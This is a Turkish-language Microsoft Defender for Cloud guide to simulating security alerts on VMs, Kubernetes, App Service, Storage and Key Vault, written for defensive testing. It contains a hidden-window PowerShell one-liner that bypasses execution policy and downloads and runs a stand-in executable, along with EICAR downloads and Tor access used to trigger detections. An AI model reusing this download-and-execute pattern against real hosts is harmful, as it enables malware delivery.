Bulut için Microsoft Defender’da uyarı doğrulaması
Bu belge, sisteminizin Bulut için Microsoft Defender uyarıları için düzgün yapılandırılıp yapılandırılmadığını doğrulamayı öğrenmenize yardımcı olur.
Güvenlik uyarıları nedir?
Uyarılar, Bulut için Defender kaynaklarınız üzerinde tehdit algıladığında oluşturduğu bildirimlerdir. Sorunu hızla araştırmak için gereken bilgilerle birlikte uyarıları önceliklendirir ve listeler. Bulut için Defender ayrıca bir saldırıyı nasıl düzeltebileceğinize ilişkin öneriler sağlar.
Daha fazla bilgi için bkz. Bulut için Defender güvenlik uyarıları ve Güvenlik uyarılarını yönetme ve yanıtlama.
Önkoşullar
Tüm uyarıları almak için makinelerinizin ve bağlı Log Analytics çalışma alanlarının aynı kiracıda olması gerekir.
Örnek güvenlik uyarıları oluşturma
Bulut için Microsoft Defender'da güvenlik uyarılarını yönetme ve yanıtlama bölümünde açıklandığı gibi yeni önizleme uyarıları deneyimini kullanıyorsanız Azure portalındaki güvenlik uyarıları sayfasından örnek uyarılar oluşturabilirsiniz.
Örnek uyarıları kullanarak:
- Microsoft Defender planlarınızın değerini ve özelliklerini değerlendirin.
- güvenlik uyarılarınız (SIEM tümleştirmeleri, iş akışı otomasyonu ve e-posta bildirimleri gibi) için yaptığınız tüm yapılandırmaları doğrulayın.
Örnek uyarılar oluşturmak için:
Abonelik Katkıda Bulunanı rolüne sahip bir kullanıcı olarak güvenlik uyarıları sayfasındaki araç çubuğunda Örnek uyarılar'ı seçin.
Aboneliği seçin.
Uyarılarını görmek istediğiniz ilgili Microsoft Defender planını/planlarını seçin.
Örnek uyarılar oluştur'u seçin.
Örnek uyarıların oluşturulduğunu bildiren bir bildirim görüntülenir:
Birkaç dakika sonra uyarılar güvenlik uyarıları sayfasında görünür. Bunlar ayrıca, Bulut için Microsoft Defender güvenlik uyarılarınızı (bağlı SIEM'ler, e-posta bildirimleri vb.) alacak şekilde yapılandırdığınız başka herhangi bir yerde de görünür.
İpucu
Uyarılar sanal kaynaklar içindir.
Azure VM'lerinizde uyarıların simülasyonunu oluşturma (Windows)
Makinenize Uç Nokta için Microsoft Defender aracısı yüklendikten sonra, Sunucular için Defender tümleştirmesinin bir parçası olarak uyarının saldırıya uğrayan kaynağı olmak istediğiniz makineden şu adımları izleyin:
Cihazda yükseltilmiş bir komut satırı istemi açın ve betiği çalıştırın:
Başlat'a gidin ve yazın
cmd
.Komut İstemi'ni sağ seçin ve Yönetici olarak çalıştır'ı seçin
İstemde aşağıdaki komutu kopyalayıp çalıştırın:
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'
Komut İstemi penceresi otomatik olarak kapanır. Başarılı olursa, 10 dakika içinde Bulut için Defender Uyarılar dikey penceresinde yeni bir uyarı görünür.
PowerShell kutusundaki ileti satırı, burada gösterildiği gibi görünmelidir:
Alternatif olarak, bu testi gerçekleştirmek için EICAR test dizesini de kullanabilirsiniz: Bir metin dosyası oluşturun, EICAR satırını yapıştırın ve dosyayı makinenizin yerel sürücüsüne yürütülebilir dosya olarak kaydedin.
Not
Windows için test uyarılarını gözden geçirirken, Uç Nokta için Defender'ın Gerçek Zamanlı koruma etkin olarak çalıştığından emin olun. Bu yapılandırmayı doğrulamayı öğrenin.
Azure VM'lerinizde uyarıların simülasyonunu oluşturma (Linux)
Makinenize Uç Nokta için Microsoft Defender aracısı yüklendikten sonra, Sunucular için Defender tümleştirmesinin bir parçası olarak uyarının saldırıya uğrayan kaynağı olmak istediğiniz makineden şu adımları izleyin:
Bir Terminal penceresi açın, aşağıdaki komutu kopyalayın ve çalıştırın:
curl -O https://secure.eicar.org/eicar.com.txt
Komut İstemi penceresi otomatik olarak kapanır. Başarılı olursa, 10 dakika içinde Bulut için Defender Uyarılar dikey penceresinde yeni bir uyarı görünür.
Not
Linux için test uyarılarını gözden geçirirken, Gerçek Zamanlı koruma etkinken Uç Nokta için Defender'ın çalıştığından emin olun. Bu yapılandırmayı doğrulamayı öğrenin.
Kubernetes'te uyarıların benzetimini yapın
Kapsayıcılar için Defender, hem kümeleriniz hem de temel alınan küme düğümleri için güvenlik uyarıları sağlar. Kapsayıcılar için Defender bunu hem denetim düzlemini (API sunucusu) hem de kapsayıcılı iş yükünü izleyerek gerçekleştirir.
Uyarınızın denetim planıyla mı yoksa ön ekine göre kapsayıcılı iş yüküyle mi ilgili olduğunu anlayabilirsiniz. Denetim düzlemi güvenlik uyarılarının ön eki K8S_
olurken, kümelerdeki çalışma zamanı iş yükü için güvenlik uyarılarının K8S.NODE_
ön eki vardır.
Aşağıdaki adımlarla hem denetim düzlemi hem de iş yükü uyarıları için uyarıların benzetimini yapabilirsiniz.
Denetim düzlemi uyarılarının simülasyonunu (K8S_ ön eki)
Önkoşullar
- Kapsayıcılar için Defender planının etkinleştirildiğinden emin olun.
- Yalnızca yay - Defender algılayıcısının yüklendiğinden emin olun.
- Yalnızca EKS veya GKE - Varsayılan denetim günlüğü koleksiyonu otomatik sağlama seçeneklerinin etkinleştirildiğinden emin olun.
Kubernetes denetim düzlemi güvenlik uyarısı simülasyonu yapmak için:
Kümeden aşağıdaki komutu çalıştırın:
kubectl get pods --namespace=asc-alerttest-662jfi039n
Şu yanıtı alırsınız:
No resource found
.30 dakika bekleyin.
Azure portalında Bulut için Defender güvenlik uyarıları sayfasına gidin.
İlgili Kubernetes kümesinde aşağıdaki uyarıyı bulun
Microsoft Defender for Cloud test alert for K8S (not a threat)
İş yükü uyarılarının simülasyonunu (K8S) oluşturun. NODE_ ön eki)
Önkoşullar
- Kapsayıcılar için Defender planının etkinleştirildiğinden emin olun.
- Defender algılayıcısının yüklü olduğundan emin olun.
Kubernetes iş yükü güvenlik uyarısı simülasyonu yapmak için:
Test komutunu çalıştırmak için bir pod oluşturun. Bu pod, kümedeki mevcut podlardan herhangi biri veya yeni bir pod olabilir. Bu örnek yaml yapılandırmasını kullanarak oluşturabilirsiniz:
apiVersion: v1 kind: Pod metadata: name: mdc-test spec: containers: - name: mdc-test image: ubuntu:18.04 command: ["/bin/sh"] args: ["-c", "while true; do echo sleeping; sleep 3600;done"]
Pod oluşturmak için komutunu çalıştırın:
kubectl apply -f <path_to_the_yaml_file>
Kümeden aşağıdaki komutu çalıştırın:
kubectl exec -it mdc-test -- bash
Yürütülebilir dosyayı ayrı bir konuma kopyalayın ve aşağıdaki komutla
cp /bin/echo ./asc_alerttest_662jfi039n
olarak yeniden adlandırın./asc_alerttest_662jfi039n
.dosyasını
./asc_alerttest_662jfi039n testing eicar pipe
yürütür.10 dakika bekleyin.
Azure portalında Bulut için Defender güvenlik uyarıları sayfasına gidin.
İlgili AKS kümesinde aşağıdaki uyarıyı
Microsoft Defender for Cloud test alert (not a threat)
bulun.
Kapsayıcılar için Microsoft Defender ile Kubernetes düğümlerinizi ve kümelerinizi savunma hakkında daha fazla bilgi de edinebilirsiniz.
App Service için uyarıların simülasyonunu oluşturma
App Service'te çalışan kaynaklar için uyarıların benzetimini yapabilirsiniz.
Yeni bir web sitesi oluşturun ve Bulut için Defender kaydedilmesi için 24 saat bekleyin veya mevcut bir web sitesini kullanın.
Web sitesi oluşturulduktan sonra aşağıdaki URL'yi kullanarak siteye erişin:
Yaklaşık 1-2 saat içinde bir uyarı oluşturulur.
Depolama ATP için uyarıların simülasyonunu oluşturma (Gelişmiş Tehdit Koruması)
Depolama için Azure Defender'ın etkinleştirildiği bir depolama hesabına gidin.
Kenar çubuğunda Kapsayıcılar sekmesini seçin.
Mevcut bir kapsayıcıya gidin veya yeni bir kapsayıcı oluşturun.
Bu kapsayıcıya bir dosya yükleyin. Hassas veriler içerebilecek herhangi bir dosyayı karşıya yüklemekten kaçının.
Karşıya yüklenen dosyayı sağ seçin ve SAS Oluştur'a tıklayın.
SAS belirteci ve URL oluştur düğmesini seçin (herhangi bir seçeneği değiştirmeniz gerekmez).
Oluşturulan SAS URL'sini kopyalayın.
Buradan indirebileceğiniz Tor tarayıcısını açın.
Tor tarayıcısında SAS URL'sine gidin. Artık karşıya yüklenen dosyayı görmeniz ve indirebilmeniz gerekir.
AppServices uyarılarını test etme
Bir uygulama hizmetleri EICAR uyarısının benzetimini yapmak için:
- App Services web sitesinin Azure portalı dikey penceresine giderek veya bu web sitesiyle ilişkili özel DNS girişini kullanarak web sitesinin HTTP uç noktasını bulun. (Azure Uygulaması Services web sitesi için varsayılan URL uç noktası son ekine
https://XXXXXXX.azurewebsites.net
sahiptir). Web sitesi, uyarı simülasyonu öncesinde oluşturulmuş bir web sitesi değil mevcut bir web sitesi olmalıdır. - Web sitesi URL'sine göz atın ve aşağıdaki sabit son eki ekleyin:
/This_Will_Generate_ASC_Alert
. URL şöyle görünmelidir:https://XXXXXXX.azurewebsites.net/This_Will_Generate_ASC_Alert
. Uyarının oluşturulması biraz zaman alabilir (yaklaşık 1,5 saat).
Azure Key Vault Tehdit Algılamayı Doğrulama
- Henüz oluşturulmuş bir Key Vault'nuz yoksa, bir anahtar kasası oluşturduğunuzdan emin olun.
- Key Vault ve gizli dizi oluşturma işlemini tamamladıktan sonra İnternet erişimi olan bir VM'ye gidin ve TOR Browser'ı indirin.
- VM'nize TOR Browser'ı yükleyin.
- Yüklemeyi tamamladıktan sonra normal tarayıcınızı açın, Azure portalında oturum açın ve Key Vault sayfasına erişin. Vurgulanan URL'yi seçin ve adresi kopyalayın.
- TOR'yi açın ve bu URL'yi yapıştırın (Azure portalına erişmek için yeniden kimlik doğrulaması yapmanız gerekir).
- Erişimi tamamladıktan sonra sol bölmedeki Gizli Diziler seçeneğini de belirleyebilirsiniz.
- TOR Tarayıcısı'nda Azure portalında oturumu kapatın ve tarayıcıyı kapatın.
- Bir süre sonra, Key Vault için Defender bu şüpheli etkinlik hakkında ayrıntılı bilgi içeren bir uyarı tetikler.
Sonraki adımlar
Bu makalede uyarıları doğrulama işlemine giriş yaptınız. Artık bu doğrulamayı bildiğinize göre aşağıdaki makaleleri inceleyin:
- Bulut için Microsoft Defender'de Azure Key Vault tehdit algılamasını doğrulama
- Bulut için Microsoft Defender'de güvenlik uyarılarını yönetme ve yanıtlama - uyarıları yönetmeyi ve Bulut için Defender güvenlik olaylarını yanıtlamayı öğrenin.
- Bulut için Microsoft Defender güvenlik uyarılarını anlama
Geri Bildirim
https://aka.ms/ContentUserFeedback.
Çok yakında: 2024 boyunca, içerik için geri bildirim mekanizması olarak GitHub Sorunları’nı kullanımdan kaldıracak ve yeni bir geri bildirim sistemiyle değiştireceğiz. Daha fazla bilgi için bkz.Gönderin ve geri bildirimi görüntüleyin